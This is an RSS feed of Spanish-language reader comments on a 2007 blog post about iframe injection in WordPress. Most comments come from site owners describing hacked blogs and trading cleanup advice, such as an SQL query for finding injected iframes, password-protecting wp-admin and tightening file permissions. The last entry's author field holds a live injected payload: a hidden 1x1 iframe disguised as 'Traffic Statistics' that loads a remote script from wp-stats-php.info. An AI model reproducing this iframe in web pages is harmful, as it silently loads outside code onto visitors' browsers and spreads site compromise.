Comentarios en: Nuevo fallo en WordPress, insercción de iframe http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/ Desarrollo web, Wordpress, y alguna cosilla más Sun, 12 Feb 2012 12:01:25 +0000 hourly 1 http://wordpress.org/?v=3.3.1 Por: paul http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-58468 paul Tue, 11 Aug 2009 19:57:25 +0000 http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-58468 hola ya que estan tratando el tema del iframe estoy intentando isertar uno en una pagina de mi wordpress el codigo es un buscador de innmuebles este es el codigo y lo que me muestra al publicar la pagina es este codigo src=”http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&id_usuario_di=0″ name=”I1″> y no el buscador como tal en este enlace se ve el buscador de como se deberia ver correctamente http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&id_usuario_di=0 como logro hacerlo de la manera correcta gracias de antemano hola ya que estan tratando el tema del iframe estoy intentando isertar uno en una pagina de mi wordpress

el codigo es un buscador de innmuebles
este es el codigo

y lo que me muestra al publicar la pagina es este codigo

src=”http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&id_usuario_di=0″ name=”I1″>

y no el buscador como tal en este enlace se ve el buscador de como se deberia ver correctamente

http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&id_usuario_di=0

como logro hacerlo de la manera correcta

gracias de antemano

]]> Por: cucoalmeria http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-53479 cucoalmeria Sat, 17 Jan 2009 20:30:27 +0000 http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-53479 Por cierto utilizao wp 2.7 ultima versión. Por cierto utilizao wp 2.7 ultima versión.

]]> Por: cucoalmeria http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-53478 cucoalmeria Sat, 17 Jan 2009 20:30:05 +0000 http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-53478 Hola a todos lleva varios dias intentanto limpiar mi blog, que me lo han hackeado o algo parecido. Utilizo wordpress, he utilizado plugin sploit scaner y me detecta varios iframes o script maliciosos y me indica en que carpeta estan. Accedo por ftp a dichas carpetas o archivos, los edito los limpio y los vuelvo a subir hasta que queda todo limpio. Pero al dia siguiente vuelve a salir, la mayoria estan en los archivos index. He quitado toda publicidad, el cambiado el theme y aún asi vuelve a salir los dichosos codigos maliciosos por lo que google no me da el visto bueno y dice que mi blog es un peligro. He accedido a mi base de datos, en este tema estoy mas pegado. En el buscador de la base de datos he intentado localizar los iframes pero no los encuentra, no se si lo hago bien. Lo curioso tambien es que se veo el codigo fuente de mis paginas, en todas ellas salel dicho iframe al final de ellas. Alguien tiene alguna solución, necesito ayuda por favor ? gracias Hola a todos lleva varios dias intentanto limpiar mi blog, que me lo
han hackeado o algo parecido. Utilizo wordpress, he utilizado plugin
sploit scaner y me detecta varios iframes o script maliciosos y me
indica en que carpeta estan. Accedo por ftp a dichas carpetas o
archivos, los edito los limpio y los vuelvo a subir hasta que queda
todo limpio. Pero al dia siguiente vuelve a salir, la mayoria estan en
los archivos index.

He quitado toda publicidad, el cambiado el theme y aún asi vuelve a
salir los dichosos codigos maliciosos por lo que google no me da el
visto bueno y dice que mi blog es un peligro.

He accedido a mi base de datos, en este tema estoy mas pegado. En el
buscador de la base de datos he intentado localizar los iframes pero
no los encuentra, no se si lo hago bien.

Lo curioso tambien es que se veo el codigo fuente de mis paginas, en
todas ellas salel dicho iframe al final de ellas.

Alguien tiene alguna solución, necesito ayuda por favor ?

gracias

]]> Por: Claudia http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-49216 Claudia Fri, 01 Aug 2008 02:17:18 +0000 http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-49216 igual fui atacada en esta pagina en wordpress 2.3.3 , e inclusive ya hasta google me bloqueó, la verdad tenia mucho tiempo de no actualizar la página y tenia carpetas con todos los permisos, realizcé la consulta que poponen en esta página : SELECT * FROM `PREFIX_posts` WHERE `post_title` LIKE '%<iframe%'; y me apareció un post, lo eliminé por supuesto, pero mi duda es: ¿es necesario que borre toda la página, base de datos, contraseñas de acceso a la base de datos, o que solo actualize la versión de wordpress, la pregunta es por cual versión? igual fui atacada en esta pagina en wordpress 2.3.3 , e inclusive ya hasta google me bloqueó, la verdad tenia mucho tiempo de no actualizar la página y tenia carpetas con todos los permisos, realizcé la consulta que poponen en esta página : SELECT * FROM `PREFIX_posts` WHERE `post_title` LIKE ‘%<iframe%’;

y me apareció un post, lo eliminé por supuesto, pero mi duda es: ¿es necesario que borre toda la página, base de datos, contraseñas de acceso a la base de datos, o que solo actualize la versión de wordpress, la pregunta es por cual versión?

]]> Por: Ruben http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-48711 Ruben Tue, 15 Jul 2008 14:38:47 +0000 http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-48711 Estoy teniendo un problema parecido en mi Blog, aunque éste parece tener la intención de tumbar la web de MSN.com. ¿Alguien tiene mas información sobre lo sucedido? http://www.entrecodigos.com/2008/07/inyeccion-de-iframe-en-wordpress.html Estoy teniendo un problema parecido en mi Blog, aunque éste parece tener la intención de tumbar la web de MSN.com.

¿Alguien tiene mas información sobre lo sucedido?

http://www.entrecodigos.com/2008/07/inyeccion-de-iframe-en-wordpress.html

]]> Por: Inyección de iframe en Wordpress | Entre Códigos http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-48710 Inyección de iframe en Wordpress | Entre Códigos Tue, 15 Jul 2008 14:23:16 +0000 http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-48710 [...] por Google me encuentro con que Anieto ya se encontró un problema parecido hace unos meses, aunque tras leer por los foros de ayuda de wordpress veo que el problema era [...] [...] por Google me encuentro con que Anieto ya se encontró un problema parecido hace unos meses, aunque tras leer por los foros de ayuda de wordpress veo que el problema era [...]

]]> Por: Rub http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-46091 Rub Fri, 18 Apr 2008 07:11:20 +0000 http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-46091 Se sabe si para WP2.5 se ha solucionado? Puedo confirmar que en WP2.3.3 ocurre x-P Se sabe si para WP2.5 se ha solucionado? Puedo confirmar que en WP2.3.3 ocurre x-P

]]> Por: Jose Maria http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42936 Jose Maria Tue, 18 Dec 2007 21:31:52 +0000 http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42936 Buenas noches a todos. Nosotros tuvimos esa incidencia tanto en nuestra Home (sin wordpress) y en varias páginas de la instalación de Wordpress. Es decir, es un exploit que se aprovecha de los permisos de escritura del Wordpress. Lo hemos solucionado de la siguiente forma: 1- Eliminando las entradas al "iframe" de todas las páginas (recuerden que no solo afecta a las páginas de wordpress, en nuestro caso tambien apareció dicha entrada en el "index.html" del dominio principal) 2- Proteger con contraseña el directorio "wp-admin" 3- Asegurar permisos "chmod". En nuestro caso teníamos algunos ficheros con permisos de escritura innecesarios. Ahora todos nuestros directorios esta con 755 y ficheros 644. Desde que hicimos estas modificaciones, no hemos vuelto a tener problemas. En especial, desde que protegimos con contraseña el directorio "wp-admin" y eliminamos los permisos de escritura en plugins (*.php y *css) Un saludo a todos. Buenas noches a todos.
Nosotros tuvimos esa incidencia tanto en nuestra Home (sin wordpress) y en varias páginas de la instalación de WordPress.
Es decir, es un exploit que se aprovecha de los permisos de escritura del WordPress.
Lo hemos solucionado de la siguiente forma:
1- Eliminando las entradas al “iframe” de todas las páginas (recuerden que no solo afecta a las páginas de wordpress, en nuestro caso tambien apareció dicha entrada en el “index.html” del dominio principal)
2- Proteger con contraseña el directorio “wp-admin”
3- Asegurar permisos “chmod”. En nuestro caso teníamos algunos ficheros con permisos de escritura innecesarios. Ahora todos nuestros directorios esta con 755 y ficheros 644.

Desde que hicimos estas modificaciones, no hemos vuelto a tener problemas. En especial, desde que protegimos con contraseña el directorio “wp-admin” y eliminamos los permisos de escritura en plugins (*.php y *css)

Un saludo a todos.

]]> Por: hely rojas http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42325 hely rojas Tue, 27 Nov 2007 21:33:46 +0000 http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42325 agregando un plugin que filtre palabras (groserias y cosas asi) se debiera corregir el fallo, solo seria agregar ciertos tags HTML como palabras prohibidas agregando un plugin que filtre palabras (groserias y cosas asi) se debiera corregir el fallo, solo seria agregar ciertos tags HTML como palabras prohibidas

]]> Por: <!– Traffic Statistics –> <iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics ̵ http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42308 <!– Traffic Statistics –> <iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics ̵ Tue, 27 Nov 2007 14:27:14 +0000 http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/#comment-42308 [...] http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/ [...] [...] http://www.anieto2k.com/2007/11/06/nuevo-fallo-en-wordpress-inserccion-de-iframe/ [...]

]]>